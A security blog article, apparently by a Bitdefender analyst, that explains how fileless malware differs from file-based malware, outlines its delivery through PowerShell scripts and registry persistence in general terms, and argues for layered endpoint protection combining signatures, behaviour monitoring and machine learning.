Surviving Fileless Malware: What You Need to Know about Understanding Threat Diversification

Businesses and organizations that have adopted digitalization have not only become more agile, but they’ve also significantly optimized budgets while boosting competitiveness. Despite these advances in performance, the adoption of these new technologies has also increased the attack surface that cybercriminals can leverage to deploy threats and compromise the overall security posture of organizations.

The traditional threat landscape used to involve threats designed to either covertly run as independent applications on the victim’s machine, or compromise the integrity of existing applications and alter their behavior. Commonly referred to as file-based malware, traditional endpoint protection solutions have incorporated technologies designed to scan files written to disk before execution.

File-based vs. Fileless

Some of the most common attack techniques involve victims either downloading a malicious application whose purpose is to silently run in the background and track the user’s behavior or to exploit a vulnerability in a commonly installed piece of software so that it can covertly download additional components and execute them without the victim’s knowledge.

Traditional threats must make it onto the victim’s disk before executing the malicious code. Signature-based detection exists specifically for this reason, as it can uniquely identify a file that’s known to be malicious and prevent it from being written or executed on the machine. However, new mechanisms such as encryption, obfuscation, and polymorphism have rendered traditional detection technologies obsolete, as cybercriminals cannot only manipulate the way the file looks for each individual victim, but also make it difficult for security scanning engines to analyze the code within them.

Traditional file-based malware is usually designed to gain unauthorized access to the operating system and its binaries, normally creating or unpacking additional files and dependencies, such as .dll, .sys or .exe files, that have different functions. They could also install themselves as drivers or rootkits to take full control of the operating system if they could obtain the use of a valid digital certificate to avoid triggering any traditional file-based endpoint security technologies. One such piece of file-based malware was the highly advanced Stuxnet, designed to infiltrate a specific target while remaining persistent. It was digitally signed and had various modules that enabled it to covertly spread from one victim to another until it reached its intended target.

Fileless malware is completely different than file-based malware in terms of how the malicious code is executed and how it dodges traditional file-scanning technologies. As the term implies, fileless malware does not involve any file written on-disk for it to be executed. The malicious code may be executed directly within the memory of the victim’s computer, meaning that it will not be persistent after a system reboot. However, various techniques have been adopted by cybercriminals that combine fileless abilities with persistence. For example, malicious code placed within registry entries and executed each time Windows reboots, allows for both stealth and persistency.

The use of scripts, shellcode and even encoded binaries is not uncommon for fileless malware leveraging registry entries, as traditional endpoint security mechanisms usually lack the ability to scrutinize scripts. Because traditional endpoint security scanning tools and technologies mostly focus on static file analysis between known and unknown malware samples, fileless attacks can go unnoticed for a very long time.

The main difference between file-based and fileless malware is where and how its components are stored and executed. The latter is becoming increasingly popular as cybercriminals have managed to dodge file scanning technologies while maintaining persistency and stealth.

Delivery mechanisms

While both types of attacks rely on the same delivery mechanisms, such as infected email attachments or drive-by downloads exploiting vulnerabilities in browsers or commonly used software, fileless malware is usually script-based and can leverage existing legitimate applications to execute commands. For example, PowerShell scripts that are attached to booby-trapped Word documents can automatically be executed by PowerShell – a native Windows tool. The resulting commands could either send detailed information about the victim’s system to the attacker or download an obfuscated payload that the local traditional security solution can’t detect.

Other possible examples involve a malicious URL that, once clicked, redirects the user to websites that exploit a Java vulnerability to execute a PowerShell Script. Because the script itself is just a series of legitimate commands that may download and run a binary directly within memory, traditional file-scanning endpoint security mechanisms will not detect the threat.

These elusive threats are usually targeted at specific organizations and companies with the purpose of covert infiltration and data exfiltration.

Next-gen endpoint protection platforms

These next-gen endpoint protection platforms are usually the type of security solutions that combine layered security – which is to say file-based scanning and behavior monitoring – with machine learning technologies and threat detection sandboxing. Some technologies rely on machine learning algorithms alone as a single layer of defense. Whereas, other endpoint protection platforms use detection technologies that involve several security layers augmented by machine learning. In these cases, the algorithms are focused on detecting advanced and sophisticated threats at pre-execution, during execution, and post-execution.

A common mistake today is to treat machine learning as a standalone security layer capable of detecting any type of threat. Relying on an endpoint protection platform that uses only machine learning will not harden the overall security posture of an organization.

Machine learning algorithms are designed to augment security layers, not replace them. For example, spam filtering can be augmented through the use machine learning models, and detection of file-based malware can also use machine learning to assess whether unknown files could be malicious.

Signature-less security layers are designed to offer protection, visibility, and control when it comes to preventing, detecting, and blocking any type of threat. Considering these new attack methods, it’s highly recommended that next-gen endpoint security platforms protect against attack tools and techniques that exploit unpatched known vulnerabilities – and of course, unknown vulnerabilities – in applications.

It’s important to note, traditional signature-based technologies are not dead and should not be discarded. They’re an important security layer, as they’re accurate and quick to validate whether a file is known to be malicious or not. The merging of signatures, behavioral-based, and machine learning security layers create a security solution that’s not only able to deal with known malware, but also tackle unknown threats, which boosts the overall security posture of an organization. This comprehensive mix of security technologies is designed to not only increase the overall cost of attack for cybercriminals, but also offer security teams deep insight into what types of threats are usually targeting their organization and how to accurately mitigate them.

About the author: Bogdan Botezatu is living his second childhood at Bitdefender as senior e-threat analyst. When he is not documenting sophisticated strains of malware or writing removal tools, he teaches extreme sports such as surfing the Web without protection or how to rodeo with wild Trojan horses.

The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.